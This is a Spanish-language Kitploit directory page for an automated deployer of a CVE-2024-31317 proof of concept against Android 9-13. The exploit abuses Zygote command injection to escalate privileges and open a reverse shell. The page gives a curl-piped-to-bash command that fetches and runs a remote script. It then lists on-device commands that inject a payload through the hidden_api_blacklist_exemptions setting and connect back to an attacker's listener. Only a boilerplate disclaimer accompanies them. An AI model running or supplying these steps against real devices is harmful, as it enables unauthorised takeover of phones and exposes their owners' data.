Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-31317-PoC-Deployer — Herramienta de despliegue automatizado para el PoC de CVE-2024-31317 en Android 9-13, que permite la escalada de privilegios mediante la inyección en Zygote y la ejecución de una shell inversa. | Kitploit
Herramientas/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
Seguridad AndroidEscalada de PrivilegiosExplotaciónShellcodePruebas de PenetraciónSeguridad MóvilDesarrollo de PayloadsExplotación de Binarios

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

Herramienta de despliegue automatizado para el PoC de CVE-2024-31317 en Android 9-13, que permite la escalada de privilegios mediante la inyección en Zygote y la ejecución de una shell inversa.

Ver Repositorio
52867hace 1 añoRevisado por Kitploit

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

Una herramienta de despliegue para la prueba de concepto del exploit CVE-2024-31317 dirigido a dispositivos Android 9 a 13.

📝 Descripción del Proyecto

CVE-2024-31317-PoC-Deployer es un script de despliegue automatizado que genera y configura rápidamente todos los archivos necesarios para explotar la vulnerabilidad CVE-2024-31317. Esta vulnerabilidad afecta a dispositivos Android 9 a 13, permitiendo la escalada de privilegios y la ejecución de código arbitrario a través del proceso Zygote.

🚨 Información de la Vulnerabilidad

  • CVE ID: CVE-2024-31317
  • Alcance: Android 9 a Android 13
  • Versión corregida: Versiones de Android con el parche de junio de 2024 y posteriores
  • Tipo de vulnerabilidad: Inyección de comandos en el proceso Zygote
  • Permiso requerido: WRITE_SECURE_SETTINGS

📦 Archivos Incluidos

  • reverse_shell.c - Programa de shell inverso implementado en C
  • payload.txt - Payload de exploit especialmente construido
  • compile.sh - Script de compilación automática
  • README.txt - Instrucciones detalladas de uso
  • CVE-2024-31317.txt - Documento de análisis técnico de la vulnerabilidad

🛠️ Inicio Rápido

  1. Ejecutar el script de despliegue remoto:

    root@kitploit:~
    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. Compilar el shell inverso:

    root@kitploit:~
    sh compile.sh
    
  3. Ejecutar el listener del shell inverso:

    root@kitploit:~
    sh reverse_shell
    

💣 Pasos de Explotación

  1. Subir payload.txt a /data/local/tmp/ en el dispositivo objetivo
  2. Reemplazar xxx.xxx.xxx en payload.txt con la IP de tu servidor de escucha
  3. Ejecutar la siguiente secuencia de comandos en el dispositivo objetivo:
    root@kitploit:~
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ Aviso Legal

Esta herramienta está destinada únicamente para pruebas de seguridad legítimas e investigación. Se debe obtener autorización explícita del sistema objetivo antes de su uso. El uso no autorizado puede infringir la ley. El desarrollador no se hace responsable de ningún uso indebido.

📜 Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.

📚 Referencias Técnicas

  • Android Security Bulletin - Junio 2024
  • Detalles de CVE-2024-31317
Descargar herramienta